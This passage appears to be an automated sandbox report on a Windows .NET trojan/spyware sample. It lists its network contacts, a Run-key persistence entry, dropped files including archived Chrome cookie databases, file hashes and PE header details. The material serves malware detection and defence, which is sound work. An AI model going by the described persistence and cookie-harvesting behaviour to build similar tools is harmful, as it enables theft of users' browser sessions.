                                                  http://eu0j0ejPMgs9.com3853321935-2125563209-4053062332-1002_Classessample2.exe, 00000001.00000003.724871830.00000000013B4000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		low

                                                  Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  208.91.198.143
                                                  		unknownUnited States
                                                  		394695PUBLIC-DOMAIN-REGISTRYUSfalse

                                                  Private

                                                  IP
                                                  192.168.2.1

                                                  General Information

                                                  Joe Sandbox Version:31.0.0 Red Diamond
                                                  Analysis ID:339443
                                                  Start date:14.01.2021
                                                  Start time:03:36:51
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 12m 25s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:light
                                                  Sample file name:sample2.bin (renamed file extension from bin to exe)
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                  Number of analysed new started processes analysed:27
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.evad.winEXE@18/10@3/2
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HDC Information:
                                                  • Successful, ratio: 0.1% (good quality ratio 0%)
                                                  • Quality average: 0%
                                                  • Quality standard deviation: 0%
                                                  HCA Information:
                                                  • Successful, ratio: 92%
                                                  • Number of executed functions: 0
                                                  • Number of non-executed functions: 0
                                                  Cookbook Comments:
                                                  • Adjust boot time
                                                  • Enable AMSI
                                                  Warnings:
                                                  Show All
                                                  • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                                  • TCP Packets have been reduced to 100
                                                  • Excluded IPs from analysis (whitelisted): 168.61.161.212, 52.255.188.83, 51.104.144.132, 92.122.213.194, 92.122.213.247, 52.155.217.156, 20.54.26.129, 67.27.157.126, 67.27.157.254, 8.253.207.120, 8.248.139.254, 8.248.117.254, 51.104.139.180
                                                  • Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, arc.msn.com.nsatc.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • VT rate limit hit for: /opt/package/joesandbox/database/analysis/339443/sample/sample2.exe

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  03:37:59AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run nwama C:\Users\user\AppData\Local\Temp\nwama\nwama.exe
                                                  03:38:07AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run nwama C:\Users\user\AppData\Local\Temp\nwama\nwama.exe

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  208.91.198.143invoice No 8882.exeGet hashmaliciousBrowse
                                                    DHL Delivery Confirmation.exeGet hashmaliciousBrowse
                                                      Verify Email.exeGet hashmaliciousBrowse
                                                        Statement of Account.docGet hashmaliciousBrowse
                                                          vsl particulars.exeGet hashmaliciousBrowse
                                                            DHL Shipment Documents.exeGet hashmaliciousBrowse
                                                              suk1MHq6DK.exeGet hashmaliciousBrowse
                                                                Swift_advise.xlsxGet hashmaliciousBrowse
                                                                  DETALLE DE PAGOS EFECTUADOS (DETAIL OF PAYMENTS.exeGet hashmaliciousBrowse
                                                                    CHEMEX DUBAI.exeGet hashmaliciousBrowse
                                                                      December_Document_.docGet hashmaliciousBrowse
                                                                        SR 16-30 nOV-2020 GULF AIR.exeGet hashmaliciousBrowse
                                                                          HSBCWE1123.exeGet hashmaliciousBrowse
                                                                            MT#4000189.exeGet hashmaliciousBrowse
                                                                              Purchase Order.exeGet hashmaliciousBrowse
                                                                                AL UAE.exeGet hashmaliciousBrowse
                                                                                  Customer Order, Images, Spec.exeGet hashmaliciousBrowse
                                                                                    file.exeGet hashmaliciousBrowse
                                                                                      Quotation.exeGet hashmaliciousBrowse
                                                                                        PMA1911003.docGet hashmaliciousBrowse

                                                                                          Domains

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                          us2.smtp.mailhostbox.comQuotation.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.223
                                                                                          Booking.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.223
                                                                                          MV. Double Miracle.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.225
                                                                                          MV Double Miracle.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.224
                                                                                          C.V. - application letter.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.223
                                                                                          PO-SOT215006A.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.224
                                                                                          AWB & Shipping Document.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.225
                                                                                          invoice No 8882.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.224
                                                                                          Shipping document.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.225
                                                                                          Y3fwLpzaXNZPaT6.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.223
                                                                                          XyZQ7im2Dv.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.223
                                                                                          FB-108N & FB-108NK #U8a62#U50f9 - #U7530#U52e4.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.223
                                                                                          Ldz62seIo3.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.225
                                                                                          VPAPvqgfkf.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.225
                                                                                          TTR payment amount 131,000 USD.xlsxGet hashmaliciousBrowse
                                                                                          • 208.91.199.225
                                                                                          ESrYdvhNfV.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.223
                                                                                          DHL Delivery Confirmation.exeGet hashmaliciousBrowse
                                                                                          • 208.91.198.143
                                                                                          KBC Enquiry No.20201228.xlsxGet hashmaliciousBrowse
                                                                                          • 208.91.199.223
                                                                                          LR8meXRan7.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.223
                                                                                          Proforma Invoice.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.223

                                                                                          ASN

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                          PUBLIC-DOMAIN-REGISTRYUSJAAkR51fQY.exeGet hashmaliciousBrowse
                                                                                          • 216.10.246.131
                                                                                          Quotation.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.223
                                                                                          Doc_18420540.docGet hashmaliciousBrowse
                                                                                          • 103.76.228.18
                                                                                          Booking.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.223
                                                                                          MV. Double Miracle.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.225
                                                                                          MV Double Miracle.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.224
                                                                                          RFQ0128SR20KWT_DEUNGJU_FAKRU_AND_NAVEED.exeGet hashmaliciousBrowse
                                                                                          • 162.222.225.57
                                                                                          C.V. - application letter.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.223
                                                                                          PO-SOT215006A.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.224
                                                                                          AWB & Shipping Document.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.223
                                                                                          invoice No 8882.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.224
                                                                                          Shipping document.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.225
                                                                                          Y3fwLpzaXNZPaT6.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.224
                                                                                          rib.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.108
                                                                                          XyZQ7im2Dv.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.223
                                                                                          FB-108N & FB-108NK #U8a62#U50f9 - #U7530#U52e4.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.223
                                                                                          Ldz62seIo3.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.225
                                                                                          VPAPvqgfkf.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.225
                                                                                          TTR payment amount 131,000 USD.xlsxGet hashmaliciousBrowse
                                                                                          • 208.91.199.225
                                                                                          ESrYdvhNfV.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.223

                                                                                          JA3 Fingerprints

                                                                                          No context

                                                                                          Dropped Files

                                                                                          No context

                                                                                          Created / dropped Files

                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\nwama.exe.log
                                                                                          Process:C:\Users\user\AppData\Local\Temp\nwama\nwama.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):665
                                                                                          Entropy (8bit):5.282361864518305
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:Q3LaJU20NaL10U29hJ5g1B0U2ukyrFk70U20qcH8O0Ug+9Yz9tv:MLF20NaL329hJ5g522rW2Mz2T
                                                                                          MD5:C6F9162A813BFA011E86162EBFC31D27
                                                                                          SHA1:0E0D4813EEA11780E84BB0DF4EC7E4ABD95E182D
                                                                                          SHA-256:103C0E7E2CC42883AB3C546D495E92986E093838B7B33CAA6FDEC29005FB68F4
                                                                                          SHA-512:5BA5620C3208117794B2D9C28ACAEF44E87E77949EFBA61146EF394D2198B91364465407E54859644EDA626F72F311D66C2E12AB6FB706CE1AC94C8152FC6A9E
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.DirectorySer#\ec97af4da869bf56e9dc343bba24999d\System.DirectoryServices.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..
                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\sample2.exe.log
                                                                                          Process:C:\Users\user\Desktop\sample2.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):665
                                                                                          Entropy (8bit):5.282361864518305
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:Q3LaJU20NaL10U29hJ5g1B0U2ukyrFk70U20qcH8O0Ug+9Yz9tv:MLF20NaL329hJ5g522rW2Mz2T
                                                                                          MD5:C6F9162A813BFA011E86162EBFC31D27
                                                                                          SHA1:0E0D4813EEA11780E84BB0DF4EC7E4ABD95E182D
                                                                                          SHA-256:103C0E7E2CC42883AB3C546D495E92986E093838B7B33CAA6FDEC29005FB68F4
                                                                                          SHA-512:5BA5620C3208117794B2D9C28ACAEF44E87E77949EFBA61146EF394D2198B91364465407E54859644EDA626F72F311D66C2E12AB6FB706CE1AC94C8152FC6A9E
                                                                                          Malicious:true
                                                                                          Reputation:low
                                                                                          Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.DirectorySer#\ec97af4da869bf56e9dc343bba24999d\System.DirectoryServices.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..
                                                                                          C:\Users\user\AppData\Local\Temp\nwama\nwama.exe
                                                                                          Process:C:\Users\user\Desktop\sample2.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):608768
                                                                                          Entropy (8bit):7.046672193911453
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:o+zgiqlYVUUJiotHw9c93n5zzsO1E48Mjr0J42lX:bl3xScRRz71Eowim
                                                                                          MD5:B0F2D519CCAE5BF1435264E0979770CE
                                                                                          SHA1:212DA7B3ED9C89D83941F6BB0DBA889FA24F8F6A
                                                                                          SHA-256:A4FDC26D6B70EAF0A62CCA36286412901F48881EAE616D38B96D8AE0CB0F29C7
                                                                                          SHA-512:A50B9D27ABDF6195A2689FF911E11CBC6F71CBF69D1872C765A9FC92B3A2A8E2717E260C76D1C91576D59F6B105A27B1CCCC6056251DC80A0DC8AFECBFF3507C
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: Metadefender, Detection: 30%, Browse
                                                                                          • Antivirus: ReversingLabs, Detection: 81%
                                                                                          Reputation:low
                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...8..^..............0..@..........._... ...`....@.. ....................................@.................................D_..O....`............................................................................... ............... ..H............text....?... ...@.................. ..`.rsrc........`.......B..............@..@.reloc...............H..............@..B................x_......H........d...............U..............................................".(.....*.r...p.....*B.(.......(....&*...0..O........s........A...%.. .o..........+............(.....o....&...X....i2..o......+...*..0...........r-..p..o ....+..*...0..F.........r0..pr4..po!....s"..........+{...o#........(..........._.0..+...o$........_.0..+...o$........_.0..+...o$........_.0..+...o$........_.0..+...o$........X.....o%...?x...s".......+s.....o&....b....Xo&....bX....Xo&....bX....Xo&....bX..
                                                                                          C:\Users\user\AppData\Local\Temp\nwama\nwama.exe:Zone.Identifier
                                                                                          Process:C:\Users\user\Desktop\sample2.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):26
                                                                                          Entropy (8bit):3.95006375643621
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                          Malicious:true
                                                                                          Reputation:high, very likely benign file
                                                                                          Preview: [ZoneTransfer]....ZoneId=0
                                                                                          C:\Users\user\AppData\Roaming\1b4bluf2.tug.zip
                                                                                          Process:C:\Users\user\AppData\Local\Temp\nwama\nwama.exe
                                                                                          File Type:Zip archive data, at least v2.0 to extract
                                                                                          Category:dropped
                                                                                          Size (bytes):1468
                                                                                          Entropy (8bit):7.131875428158717
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:98MoAushnKsCT40V6MCY8xWG3BSg8lom/Z8IgRk8cDj8D6tDf7uEeNYJKv8WWf6Q:98MoAhhKl/VDCvx93BSg0thdgRkxJtDL
                                                                                          MD5:535BCBE2A74CFC076571E4D66FD063DA
                                                                                          SHA1:4F9BD7425ED0B967D816538A89B916B61265694A
                                                                                          SHA-256:9AF280DBB1847681C487FA67A7D0A4FA5E672883D1E9C8BC310AFEAB79F3B6F8
                                                                                          SHA-512:6A8E45822D0A46F734704EA88C73A9A56C84FD682B6905F2AAEDB6707CD2B1AC251B996A61DE6F6570EEC57B073FE2308CB5FBE175FBACDEAEAEEB4336A19379
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview: PK.........K>Q............#...1b4bluf2.tug/Chrome/Default/Cookies..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"^......^dmz....~._...5~.4.5~._.......{~-......kz..=...1>........5~..8.5~..._.......~.......G...=?z~...........~._...m.......~.6.......y.?~..W..oN.7.O...............g/.~~.*}....W...U...o........}...y..\w?[e..Q.nU.y..h~.&...<..mW....Yf.e6.....y....s.......Iw..*...i.e......h..xm..^......<y..........a.hv......4....<_lh.3....O|u.n......Q.).sg....~......5..,.........u[....................e.Z.m...Z....-p../_|...N.}.!..|u....'..N..Q*d.......~...z.-....._......7.....?.k....o....=?z~.......G...=?z~.......G..+........s..L..%'.J0...H.T.....................E....6k...n.k .........M....?....=?z~.......G...=?z~.......G....;....@.....................2..1..k.&..A.....G...=?z~.......G...=?z....!......z?.[....c?F...?t.7.5.....o....?._T.E..).~q...q.w../....../ww............?.[........7i..
                                                                                          C:\Users\user\AppData\Roaming\1b4bluf2.tug\Chrome\Default\Cookies
                                                                                          Process:C:\Users\user\AppData\Local\Temp\nwama\nwama.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.7006690334145785
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
                                                                                          MD5:A7FE10DA330AD03BF22DC9AC76BBB3E4
                                                                                          SHA1:1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
                                                                                          SHA-256:8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
                                                                                          SHA-512:1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
                                                                                          Malicious:false
                                                                                          Reputation:moderate, very likely benign file
                                                                                          Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          C:\Users\user\AppData\Roaming\j0jrvzzu.5ob.zip
                                                                                          Process:C:\Users\user\Desktop\sample2.exe
                                                                                          File Type:Zip archive data, at least v2.0 to extract
                                                                                          Category:modified
                                                                                          Size (bytes):1468
                                                                                          Entropy (8bit):7.131021182385188
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:98MKJushnKsCT40V6MCY8xWG3BSg8lom/Z8IgRk8cDj8D6tDf7uEeNYJKv8WWf6P:98MKJhhKl/VDCvx93BSg0thdgRkxJtDo
                                                                                          MD5:8322041C86EA6665C4EE21EA7F53B761
                                                                                          SHA1:2EEE1280B95080FFA5463A9D1DA9914D07DC135E
                                                                                          SHA-256:1234B9AC16387AEAD74BF68107E1814A73D9DB83D1A40D3E12A37285097CE84F
                                                                                          SHA-512:324FB84610034CF7C4887768B0215CEB1A82FEF6EC92FAA3EA304DD81E90F40CBD1925F5720CA467F101249EFA96CFA49C22B896CFCAE909B6A98DF4D0780D32
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview: PK.........K>Q............#...j0jrvzzu.5ob/Chrome/Default/Cookies..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"^......^dmz....~._...5~.4.5~._.......{~-......kz..=...1>........5~..8.5~..._.......~.......G...=?z~...........~._...m.......~.6.......y.?~..W..oN.7.O...............g/.~~.*}....W...U...o........}...y..\w?[e..Q.nU.y..h~.&...<..mW....Yf.e6.....y....s.......Iw..*...i.e......h..xm..^......<y..........a.hv......4....<_lh.3....O|u.n......Q.).sg....~......5..,.........u[....................e.Z.m...Z....-p../_|...N.}.!..|u....'..N..Q*d.......~...z.-....._......7.....?.k....o....=?z~.......G...=?z~.......G..+........s..L..%'.J0...H.T.....................E....6k...n.k .........M....?....=?z~.......G...=?z~.......G....;....@.....................2..1..k.&..A.....G...=?z~.......G...=?z....!......z?.[....c?F...?t.7.5.....o....?._T.E..).~q...q.w../....../ww............?.[........7i..
                                                                                          C:\Users\user\AppData\Roaming\j0jrvzzu.5ob\Chrome\Default\Cookies
                                                                                          Process:C:\Users\user\Desktop\sample2.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.7006690334145785
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
                                                                                          MD5:A7FE10DA330AD03BF22DC9AC76BBB3E4
                                                                                          SHA1:1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
                                                                                          SHA-256:8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
                                                                                          SHA-512:1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
                                                                                          Malicious:false
                                                                                          Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          C:\Users\user\AppData\Roaming\y2nzgw3x.tiq.zip
                                                                                          Process:C:\Users\user\AppData\Local\Temp\nwama\nwama.exe
                                                                                          File Type:Zip archive data, at least v2.0 to extract
                                                                                          Category:dropped
                                                                                          Size (bytes):1468
                                                                                          Entropy (8bit):7.128952402557935
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:98MtBushnKsCT40V6MCY8xWG3BSg8lom/Z8IgRk8cDj8D6tDf7uEeNYJKv8WWf6K:98MfhhKl/VDCvx93BSg0thdgRkxJtDzx
                                                                                          MD5:ECA5AA866F8DCF612B56EE50A2EFB2A4
                                                                                          SHA1:12046CB3FB5A2E112603EB67C7D7413D6DBCE0CA
                                                                                          SHA-256:A23A81E9C35EF744F8D3F5FBCAB2DFFCDCB5231090BC0D4502A4776E33C55301
                                                                                          SHA-512:1C7D5827FD92BC05F7DB0889D40D8215C0F5E5F8AD88F5C149ECA44F80BEB241B20CCE7197758F881AB607E4A37E98A6F137FD48043EB77F35A6BA980D72A213
                                                                                          Malicious:false
                                                                                          Preview: PK.........K>Q............#...y2nzgw3x.tiq/Chrome/Default/Cookies..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"^......^dmz....~._...5~.4.5~._.......{~-......kz..=...1>........5~..8.5~..._.......~.......G...=?z~...........~._...m.......~.6.......y.?~..W..oN.7.O...............g/.~~.*}....W...U...o........}...y..\w?[e..Q.nU.y..h~.&...<..mW....Yf.e6.....y....s.......Iw..*...i.e......h..xm..^......<y..........a.hv......4....<_lh.3....O|u.n......Q.).sg....~......5..,.........u[....................e.Z.m...Z....-p../_|...N.}.!..|u....'..N..Q*d.......~...z.-....._......7.....?.k....o....=?z~.......G...=?z~.......G..+........s..L..%'.J0...H.T.....................E....6k...n.k .........M....?....=?z~.......G...=?z~.......G....;....@.....................2..1..k.&..A.....G...=?z~.......G...=?z....!......z?.[....c?F...?t.7.5.....o....?._T.E..).~q...q.w../....../ww............?.[........7i..
                                                                                          C:\Users\user\AppData\Roaming\y2nzgw3x.tiq\Chrome\Default\Cookies
                                                                                          Process:C:\Users\user\AppData\Local\Temp\nwama\nwama.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.7006690334145785
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
                                                                                          MD5:A7FE10DA330AD03BF22DC9AC76BBB3E4
                                                                                          SHA1:1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
                                                                                          SHA-256:8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
                                                                                          SHA-512:1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
                                                                                          Malicious:false
                                                                                          Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Entropy (8bit):7.046672193911453
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                          File name:sample2.exe
                                                                                          File size:608768
                                                                                          MD5:b0f2d519ccae5bf1435264e0979770ce
                                                                                          SHA1:212da7b3ed9c89d83941f6bb0dba889fa24f8f6a
                                                                                          SHA256:a4fdc26d6b70eaf0a62cca36286412901f48881eae616d38b96d8ae0cb0f29c7
                                                                                          SHA512:a50b9d27abdf6195a2689ff911e11cbc6f71cbf69d1872c765a9fc92b3a2a8e2717e260c76d1c91576d59f6b105a27b1cccc6056251dc80a0dc8afecbff3507c
                                                                                          SSDEEP:12288:o+zgiqlYVUUJiotHw9c93n5zzsO1E48Mjr0J42lX:bl3xScRRz71Eowim
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...8..^..............0..@..........._... ...`....@.. ....................................@................................

                                                                                          File Icon

                                                                                          Icon Hash:00828e8e8686b000

                                                                                          Static PE Info

                                                                                          General

                                                                                          Entrypoint:0x495f96
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                          Time Stamp:0x5E981D38 [Thu Apr 16 08:54:16 2020 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:v2.0.50727
                                                                                          OS Version Major:4
                                                                                          OS Version Minor:0
                                                                                          File Version Major:4
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:4
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                          Entrypoint Preview

                                                                                          Instruction
                                                                                          jmp dword ptr [00402000h]
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
